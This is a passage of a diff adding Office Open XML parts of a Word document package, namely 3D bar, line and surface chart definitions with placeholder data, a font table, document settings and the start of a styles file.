</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:shape val="pyramid"/>
<c:axId val="71774208"/>
<c:axId val="71776128"/>
<c:axId val="0"/>
</c:bar3DChart>
<c:catAx>
<c:axId val="71774208"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="71776128"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="71776128"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="71774208"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>


@ -0,0 +1,230 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:bar3DChart>
<c:barDir val="col"/>
<c:grouping val="standard"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:shape val="pyramid"/>
<c:axId val="50252800"/>
<c:axId val="50255744"/>
<c:axId val="71870208"/>
</c:bar3DChart>
<c:catAx>
<c:axId val="50252800"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50255744"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="50255744"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50252800"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
<c:serAx>
<c:axId val="71870208"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50255744"/>
<c:crosses val="autoZero"/>
</c:serAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>


@ -0,0 +1,110 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:title>
<c:layout/>
</c:title>
<c:view3D>
<c:rotX val="30"/>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:bar3DChart>
<c:barDir val="bar"/>
<c:grouping val="clustered"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Sales</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Sq.. 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Sq.. 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Sq.. 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Sq.. 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>8.1999999999999993</c:v>
</c:pt>
<c:pt idx="1">
<c:v>3.2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.4</c:v>
</c:pt>
<c:pt idx="3">
<c:v>1.2</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:shape val="box"/>
<c:axId val="50777472"/>
<c:axId val="50780032"/>
<c:axId val="0"/>
</c:bar3DChart>
<c:valAx>
<c:axId val="50780032"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50777472"/>
<c:crossBetween val="between"/>
</c:valAx>
<c:catAx>
<c:axId val="50777472"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50780032"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>


@ -0,0 +1,228 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:line3DChart>
<c:grouping val="standard"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:axId val="50940928"/>
<c:axId val="68729472"/>
<c:axId val="78014208"/>
</c:line3DChart>
<c:catAx>
<c:axId val="50940928"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="68729472"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="68729472"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50940928"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
<c:serAx>
<c:axId val="78014208"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="68729472"/>
<c:crosses val="autoZero"/>
</c:serAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>


@ -0,0 +1,238 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:surface3DChart>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:bandFmts/>
<c:axId val="59304576"/>
<c:axId val="68746240"/>
<c:axId val="59572224"/>
</c:surface3DChart>
<c:catAx>
<c:axId val="59304576"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="68746240"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="68746240"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="59304576"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="midCat"/>
</c:valAx>
<c:serAx>
<c:axId val="59572224"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="68746240"/>
<c:crosses val="autoZero"/>
</c:serAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
<c:txPr>
<a:bodyPr/>
<a:lstStyle/>
<a:p>
<a:pPr rtl="0">
<a:defRPr/>
</a:pPr>
<a:endParaRPr lang="en-US"/>
</a:p>
</c:txPr>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>


@ -0,0 +1,31 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:font w:name="Calibri">
<w:panose1 w:val="020F0502020204030204"/>
<w:charset w:val="CC"/>
<w:family w:val="swiss"/>
<w:pitch w:val="variable"/>
<w:sig w:usb0="E00002FF" w:usb1="4000ACFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
</w:font>
<w:font w:name="Times New Roman">
<w:panose1 w:val="02020603050405020304"/>
<w:charset w:val="CC"/>
<w:family w:val="roman"/>
<w:pitch w:val="variable"/>
<w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
</w:font>
<w:font w:name="Tahoma">
<w:panose1 w:val="020B0604030504040204"/>
<w:charset w:val="CC"/>
<w:family w:val="swiss"/>
<w:pitch w:val="variable"/>
<w:sig w:usb0="E1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
</w:font>
<w:font w:name="Cambria">
<w:panose1 w:val="02040503050406030204"/>
<w:charset w:val="CC"/>
<w:family w:val="roman"/>
<w:pitch w:val="variable"/>
<w:sig w:usb0="E00002FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
</w:font>
</w:fonts>

Binary file not shown.


@ -0,0 +1,36 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main">
<w:zoom w:percent="100"/>
<w:proofState w:spelling="clean" w:grammar="clean"/>
<w:defaultTabStop w:val="708"/>
<w:characterSpacingControl w:val="doNotCompress"/>
<w:compat/>
<w:rsids>
<w:rsidRoot w:val="00D15BD0"/>
<w:rsid w:val="00D15BD0"/>
<w:rsid w:val="00F8254F"/>
</w:rsids>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr>
<w:themeFontLang w:val="en-US"/>
<w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/>
<w:shapeDefaults>
<o:shapedefaults v:ext="edit" spidmax="1026"/>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout>
</w:shapeDefaults>
<w:decimalSymbol w:val=","/>
<w:listSeparator w:val=";"/>
</w:settings>


@ -0,0 +1,220 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:docDefaults>
<w:rPrDefault>
<w:rPr>
<w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
<w:sz w:val="22"/>
<w:szCs w:val="22"/>
<w:lang w:val="en-US" w:bidi="ar-SA"/>
</w:rPr>
</w:rPrDefault>
<w:pPrDefault>
<w:pPr>
<w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
</w:pPr>
</w:pPrDefault>
</w:docDefaults>
<w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
<w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="toc 1" w:uiPriority="39"/>
<w:lsdException w:name="toc 2" w:uiPriority="39"/>
<w:lsdException w:name="toc 3" w:uiPriority="39"/>
<w:lsdException w:name="toc 4" w:uiPriority="39"/>
<w:lsdException w:name="toc 5" w:uiPriority="39"/>
<w:lsdException w:name="toc 6" w:uiPriority="39"/>
<w:lsdException w:name="toc 7" w:uiPriority="39"/>
<w:lsdException w:name="toc 8" w:uiPriority="39"/>
<w:lsdException w:name="toc 9" w:uiPriority="39"/>
<w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
<w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
<w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
<w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
<w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
